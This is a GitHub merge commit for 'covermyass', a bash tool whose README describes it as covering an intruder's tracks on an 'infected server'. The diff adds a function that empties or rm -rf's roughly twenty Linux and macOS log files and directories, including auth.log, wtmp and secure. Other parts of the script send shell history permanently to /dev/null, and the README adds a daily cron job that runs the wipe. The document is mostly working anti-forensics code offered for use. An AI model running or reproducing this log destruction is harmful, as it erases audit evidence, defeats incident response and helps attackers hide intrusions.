Merge pull request #3 from sundowndev/travis-cfg

Travis config & clear logs feature
sundowndev · Mar 17, 2019 · e5a0d12 · e5a0d12
2 parents 17161cb + 99a9034
commit e5a0d12
Show file tree

Hide file tree

Showing 3 changed files with 93 additions and 24 deletions.
diff --git a/.travis.yml b/.travis.yml
@@ -1,3 +1,6 @@
 os: linux
 
-script: echo "test" && exit 1
+script:
+- chmod +x *.sh
+- sudo ./install.sh
+- shellcheck covermyass.sh
diff --git a/README.md b/README.md
@@ -1,8 +1,37 @@
-# Cover my ass
-
-CLI tool to cover your tracks on UNIX systems. Designed for pen testing "Covering Tracks" phase, before exiting the infected server. Or, even better, permanently disable bash & auth history.
-
-**This tool supports zsh shell.**
+# Covermyass
+
+![Build status](https://img.shields.io/travis/sundowndev/covermyass/master.svg?style=flat-square)
+![Tag](https://img.shields.io/github/tag/SundownDEV/covermyass.svg?style=flat-square)
+
+CLI tool to cover your tracks on UNIX systems. Designed for pen testing "Covering Tracks" phase, before exiting the infected server. Or, even better, permanently disable system logs for post-exploitation.
+
+This tool allows you to clear log files such as :
+
+```bash
+# Linux
+/var/log/messages # General message and system related stuff
+/var/log/auth.log # Authenication logs
+/var/log/kern.log # Kernel logs
+/var/log/cron.log # Crond logs
+/var/log/maillog # Mail server logs
+/var/log/boot.log # System boot log
+/var/log/mysqld.log # MySQL database server log file
+/var/log/qmail # Qmail log directory
+/var/log/httpd # Apache access and error logs directory
+/var/log/lighttpd # Lighttpd access and error logs directory
+/var/log/secure # Authentication log
+/var/log/utmp # Login records file
+/var/log/wtmp # Login records file
+/var/log/yum.log # Yum command log file
+
+# macOS
+/var/log/system.log # System Log
+/var/log/DiagnosticMessages # Mac Analytics Data
+/Library/Logs # System Application Logs
+/Library/Logs/DiagnosticReports # System Reports
+~/Library/Logs # User Application Logs
+~/Library/Logs/DiagnosticReports # User Reports
+```
 
 ## Installation
 
@@ -20,7 +49,7 @@ curl -sSL https://raw.githubusercontent.com/sundowndev/covermyass/master/covermy
 chmod +x ./covermyass
 ```
 
-Keep in mind that without sudo privileges, you'll be unable to clean auth logs.
+Keep in mind that without sudo privileges, you *might* be unable to system level log files (`/var/log`).
 
 ## Usage
 
@@ -37,23 +66,25 @@ Welcome to Cover my ass tool !
 
 Select an option :
 
-1) Clear auth & bash history for user root
+1) Clear logs for user root
 2) Permenently disable auth & bash history
 3) Restore settings to default
 99) Exit tool
 
 >
 ```
 
-Clear auth & history instantly
+*NOTE: don't forget to exit the terminal session since the bash history is cached.*
+
+Clear logs instantly (requires *sudo* to be efficient) :
 
 ```
-covermyass now
+sudo covermyass now
 ```
 
 ### Using cron job
 
-Clear auth & bash history every day at 5am
+Clear bash history every day at 5am :
 
 ```
 0 5 * * * covermyass now >/dev/null 2>&1

diff --git a/covermyass.sh b/covermyass.sh
@@ -1,5 +1,28 @@
 #!/usr/bin/env bash
 
+LOGS_FILES=(
+        /var/log/messages # General message and system related stuff
+        /var/log/auth.log # Authenication logs
+        /var/log/kern.log # Kernel logs
+        /var/log/cron.log # Crond logs
+        /var/log/maillog # Mail server logs
+        /var/log/boot.log # System boot log
+        /var/log/mysqld.log # MySQL database server log file
+        /var/log/qmail # Qmail log directory
+        /var/log/httpd # Apache access and error logs directory
+        /var/log/lighttpd # Lighttpd access and error logs directory
+        /var/log/secure # Authentication log
+        /var/log/utmp # Login records file
+        /var/log/wtmp # Login records file
+        /var/log/yum.log # Yum command log file
+        /var/log/system.log # System Log
+        /var/log/DiagnosticMessages # Mac Analytics Data
+        /Library/Logs # System Application Logs
+        /Library/Logs/DiagnosticReports # System Reports
+        ~/Library/Logs # User Application Logs
+        ~/Library/Logs/DiagnosticReports # User Reports
+)
+
 function isRoot () {
         if [ "$EUID" -ne 0 ]; then
                 return 1
@@ -13,7 +36,7 @@ function menu () {
         echo
         echo "Select an option :"
         echo
-        echo "1) Clear auth & bash history for user $USER"
+        echo "1) Clear logs for user $USER"
         echo "2) Permenently disable auth & bash history"
         echo "3) Restore settings to default"
         echo "99) Exit tool"
@@ -37,7 +60,7 @@ function disableHistory () {
         ln /dev/null ~/.bash_history -sf
         echo "[+] Permanently sending bash_history to /dev/null"
 
-        if [ -a ~/.zsh_history ]; then
+        if [ -f ~/.zsh_history ]; then
                 ln /dev/null ~/.zsh_history -sf
                 echo "[+] Permanently sending zsh_history to /dev/null"
         fi
@@ -87,17 +110,29 @@ function enableHistory () {
         echo "Permenently enabled bash log."
 }
 
-function clearAuth () {
-        if [ -w /var/log/auth.log ]; then
-                echo "" > /var/log/auth.log
-                echo "[+] /var/log/auth.log cleaned."
-        else
-                echo "[!] /var/log/auth.log is not writable! Retry using sudo."
-        fi
+function clearLogs () {
+        for i in "${LOGS_FILES[@]}"
+        do
+                if [ -f "$i" ]; then
+                        if [ -w "$i" ]; then
+                                echo "" > "$i"
+                                echo "[+] $i cleaned."
+                        else
+                                echo "[!] $i is not writable! Retry using sudo."
+                        fi
+                elif [ -d "$i" ]; then
+                        if [ -w "$i" ]; then
+                                rm -rf "${i:?}"/*
+                                echo "[+] $i cleaned."
+                        else
+                                echo "[!] $i is not writable! Retry using sudo."
+                        fi
+                fi
+        done
 }
 
 function clearHistory () {
-        if [ -a ~/.zsh_history ]; then
+        if [ -f ~/.zsh_history ]; then
                 echo "" > ~/.zsh_history
                 echo "[+] ~/.zsh_history cleaned."
         fi
@@ -121,16 +156,16 @@ clear # Clear output
 
 # "now" option
 if [ -n "$1" ] && [ "$1" == 'now' ]; then
-        clearAuth
+        clearLogs
         clearHistory
         exitTool
 fi
 
 menu
 
 if [[ $option == 1 ]]; then
-        # Clear current history
-        clearAuth
+        # Clear logs & current history
+        clearLogs
         clearHistory
 elif [[ $option == 2 ]]; then
         # Permenently disable auth & bash log